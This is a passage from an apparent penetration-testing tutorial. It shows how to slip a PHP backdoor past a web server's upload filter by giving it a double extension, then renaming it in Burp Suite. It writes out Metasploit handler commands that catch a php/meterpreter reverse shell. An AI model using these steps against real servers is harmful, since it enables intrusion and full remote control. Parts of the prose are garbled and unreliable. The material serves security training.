File upload using a double extension method
Some web applications with a medium security level configuration will allow you to upload files that have certain types of extensions like “.jpeg” and “.png.”
In other words, uploading documents is limited to these sorts of expansions; else, they won’t have the option to get uploaded on the web server. To bypass this, we need to deceive the web server by inserting a file with multiple extensions.
In this example, we will try to upload the same malicious file we used previously but rename it to “image_file.php.jpeg.” It will seem as if it is of the “.jpeg” format having some data, but in reality, it will execute the “.php” file leading to an application.
Before jumping to hands-on activity, let’s set the security level of the target web server to a medium.
To be successful in any web application attacks, we need to be proficient in the “Burp Suite” tool. “Burp Suite” is a graphical tool designed for testing Web application security. It is intended to give a far-reaching solution for web application security checks. Notwithstanding fundamental usefulness, such as a scanner, proxy server, and intruder, the device additionally contains further developed choices, like a repeater, spider, comparer, decoder, extender, and sequencer.
Burp Proxy enables manual security analyzers to catch all requests and responses between the browser and the objective application, in any event, when HTTPS is being utilized. We can view, edit, or drop individual messages to manipulate the server-side or client-side components of the application.
Kali Linux comes preinstalled with “Burp Suite,” go to the application menu and search for it. Once you located it, double click on it to start the tool. To intercept all requests and responses between the browser and the server, we need to perform a small configuration on our browser proxy and change it to Burp’s interface. To do so, first go to the “Proxy” tab of the “Burp Suite,” and under the “Options” tab, locate the interface and note it down.
Then open up your Firefox browser and go to the “General” settings.
Under the “Network Proxy” settings, select the “Manual proxy configuration” option and type the Burp’s interface. Now our “Burp Suite” is ready to intercept all online communications.
Let’s upload our malicious file with a double extension onto the web server.
Once you click on “Upload,” go to the “Burp Suite” to analyze the intercepted traffic. Form the Burp tool, click on the “Proxy” tab and go to the “Intercept” tab. Under the “Headers” tab, locate the filename “image_file.php.jpeg” and rename it to “image_file.php,” make sure that the filename is within the quotation marks. Then click on the “Forward” button to perform the upload action.
As you can see in the image below, we have successfully uploaded our PHP file to a web server with a medium security level. To exploit it further, copy the path of the uploaded file and use it in the URL search box.
Before doing that, we need to start the multi-handler and listen for an incoming connection.
Ex: (msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.10.10.8
msf5 exploit(multi/handler) > set lport 4444
msf5 exploit(multi/handler) > exploit).
Now we can paste the path and run the backdoor on the server-side.
Once our malicious file is executed, the attacker’s computer will receive a reverse shell connection with full root control.
